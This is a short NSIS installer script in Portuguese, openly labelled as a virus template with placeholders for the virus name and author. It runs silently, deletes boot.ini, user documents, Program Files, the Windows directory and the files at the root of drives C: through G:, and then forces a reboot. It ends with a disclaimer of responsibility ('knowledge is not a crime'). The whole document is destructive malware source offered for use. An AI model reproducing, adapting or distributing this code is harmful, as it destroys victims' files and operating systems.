!define PRODUCT_NAME "Nome Do Virus"
!define PRODUCT_VERSION "2.0"
!define PRODUCT_PUBLISHER "Seu nome"
SetCompressor lzma
Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "nome do arquivo.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent
Section "Sec001" SEC01
Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd
Section -Post
Reboot
SectionEnd
Eu não me Responsabilizo por nada que vc venha a fazer usando os conhecimentos aqui contidos
Conhecimento não é crime